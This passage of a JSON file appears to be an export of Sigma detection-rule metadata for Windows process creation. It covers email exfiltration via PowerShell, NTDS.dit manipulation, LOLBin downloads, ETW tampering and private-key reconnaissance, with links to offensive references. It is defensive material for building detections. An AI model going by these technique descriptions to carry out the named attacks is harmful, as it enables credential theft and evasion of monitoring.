"windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", "value": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE" }, { "description": "Detects the use of NSudo tool for command execution", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_nsudo.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nsudo.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", "value": "PUA - NSudo Execution" }, { "description": "Detects email exfiltration via powershell cmdlets", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "creation_date": "2022-09-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_email_exfil.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", "value": "Email Exifiltration Via Powershell" }, { "description": "Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-15", "falsepositive": [ "False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs." ], "filename": "proc_creation_win_diskshadow_script_mode_susp_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa1a7e52-3d02-435b-81b8-00da14dd66c1", "value": "Diskshadow Script Mode - Execution From Potential Suspicious Location" }, { "description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.", "meta": { "author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2019-08-24", "falsepositive": [ "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962", "Ansible" ], "filename": "proc_creation_win_csc_susp_dynamic_compilation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1206874118282448897", "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe", "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", "value": "Dynamic .NET Compilation Via Csc.EXE" }, { "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", "meta": { "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-05-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", "https://www.virusradar.com/en/Win32_Kasidet.AD/description", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "value": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Legitimate usage of the tool" ], "filename": "proc_creation_win_remote_access_tools_simple_help.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95e60a2b-4705-444b-b7da-ba0ea81a3ee2", "value": "Remote Access Tool - Simple Help Execution" }, { "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-11-23", "falsepositive": [ "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" }, { "description": "Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri", "creation_date": "2024-06-26", "falsepositive": [ "Legitimate usage of DSInternals for administration or audit purpose." ], "filename": "proc_creation_win_powershell_dsinternals_cmdlets.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dsinternals_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43d91656-a9b2-4541-b7e2-6a9bd3a13f4e", "value": "DSInternals Suspicious PowerShell Cmdlets" }, { "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-11", "falsepositive": [ "Legitimate deactivation by administrative staff", "Installer tools that disable services, e.g. before log collection agent installation" ], "filename": "proc_creation_win_logman_disable_eventlog.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1359039665232306183?s=21", "https://ss64.com/nt/logman.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1070.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "value": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE" }, { "description": "Detects calls to the AtomicTestHarnesses \"Invoke-ATHRemoteFXvGPUDisablementCommand\" which is designed to abuse the \"RemoteFXvGPUDisablement.exe\" binary to run custom PowerShell code via module load-order hijacking.", "meta": { "author": "frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "value": "RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses" }, { "description": "Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_webshell_hacking.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://youtu.be/7aemGhaE9ds?t=641", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1018", "attack.t1033", "attack.t1087" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", "value": "Webshell Hacking Activity Patterns" }, { "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", "meta": { "author": "Teymur Kheirkhabarov", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "value": "Potential Privilege Escalation via Service Permissions Weakness" }, { "description": "Detects execution of Cmdl32 with the \"/vpn\" and \"/lan\" flags.\nAttackers can abuse this utility in order to download arbitrary files via a configuration file.\nInspect the location and the content of the file passed as an argument in order to determine if it is suspicious.\n", "meta": { "author": "frack113", "creation_date": "2021-11-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmdl32_arbitrary_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", "https://github.com/LOLBAS-Project/LOLBAS/pull/151", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdl32_arbitrary_file_download.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", "value": "Potential Arbitrary File Download Via Cmdl32.EXE" }, { "description": "The OpenWith.exe executes other binary", "meta": { "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "creation_date": "2019-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_openwith.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/harr0ey/status/991670870384021504", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "value": "OpenWith.exe Executes Specified Binary" }, { "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_no_space_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1562072617552678912", "https://ss64.com/nt/cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", "value": "Cmd.EXE Missing Space Characters Execution Anomaly" }, { "description": "Detects PowerShell script execution via input stream redirect", "meta": { "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "value": "Run PowerShell Script from Redirected Input Stream" }, { "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", "meta": { "author": "frack113", "creation_date": "2021-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_alternate_data_streams.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "value": "Execute From Alternate Data Streams" }, { "description": "Detects the rare use of the command line tool shutdown to logoff a user", "meta": { "author": "frack113", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_shutdown_logoff.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "value": "Suspicious Execution of Shutdown to Log Out" }, { "description": "Detects suspicious parent process for cmd.exe", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_unusual_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "value": "Unusual Parent Process For Cmd.EXE" }, { "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", "meta": { "author": "_pete_0, TheDFIRReport", "creation_date": "2022-05-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" ], "tags": [ "attack.execution", "attack.t1059.003", "stp.1u" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "value": "Operator Bloopers Cobalt Strike Commands" }, { "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_ntlm_coercion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/issues/243", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "value": "Potential NTLM Coercion Via Certutil.EXE" }, { "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_private_keys_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "value": "Private Keys Reconnaissance Via CommandLine Tools" }, { "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mspub_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mspub_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "value": "Arbitrary File Download Via MSPUB.EXE" }, { "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "meta": { "author": "frack113", "creation_date": "2021-07-27", "falsepositive": [ "Legitimate activity is expected since compressing files with a password is common." ], "filename": "proc_creation_win_7zip_password_compression.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" }, { "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_winword_dll_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7375e28-5c14-432f-b8d1-1db26c832df3", "value": "Potential Arbitrary DLL Load Using Winword" }, { "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as other files", "meta": { "author": "Florian Roth (Nextron Systems), frack113", "creation_date": "2021-11-29", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_regsvr32_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "value": "Regsvr32 DLL Execution With Suspicious File Extension" }, { "description": "Detects presence of a potentially xor encoded powershell command", "meta": { "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "creation_date": "2018-09-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_xor_commandline.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mez0.cc/posts/cobaltstrike-powershell-exec/", "https://zero2auto.com/2020/05/19/netwalker-re/", "https://redcanary.com/blog/yellow-cockatoo/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001", "attack.t1140", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 